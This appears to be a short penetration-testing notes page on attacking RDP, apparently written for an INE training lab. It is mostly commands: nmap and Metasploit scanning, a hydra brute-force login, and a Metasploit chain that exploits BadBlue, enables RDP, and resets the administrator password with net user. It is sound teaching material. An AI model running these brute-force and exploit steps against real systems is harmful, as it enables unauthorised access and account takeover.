RDP

Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft, enabling users to remotely access and interact with a Windows system through a graphical user interface (GUI). By default, RDP uses TCP port 3389 but can be configured to run on other ports. Authentication requires valid user credentials, including a username and password in cleartext. Attackers can attempt RDP brute-force attacks to discover valid credentials and gain unauthorized access to a target system.

Enumeration & Exploitation

Enumeration

nmap -sV -p- [IP]

w/ Metasploit

msfconsole -q
search rdp_scanner
use auxiliary/scanner/rdp/rdp_scanner
show options
set RHOSTS
set RPORT
run

hydra -L [wordlist] -P [passlist] rdp://IP -s [PORT]

# connect using xfreerdp
xfreerdp /u:username /p:password /v:IP:Port

BadBlue & Enable RDP

msfconsole -q
use exploit/windows/http/badblue_passthru
set RHOSTS demo.ine.local
exploit

use post/windows/manage/enable_rdp
set SESSION 1
exploit

sessions -i 1
shell
net user administrator hacker_123321

xfreerdp /u:administrator /p:hacker_123321 /v:demo.ine.local

Y

PreviousApache Tomcat Web Server NextWinRM

Last updated 1 month ago

Enumeration & Exploitation

Enumeration

Login Brute-force

BadBlue & Enable RDP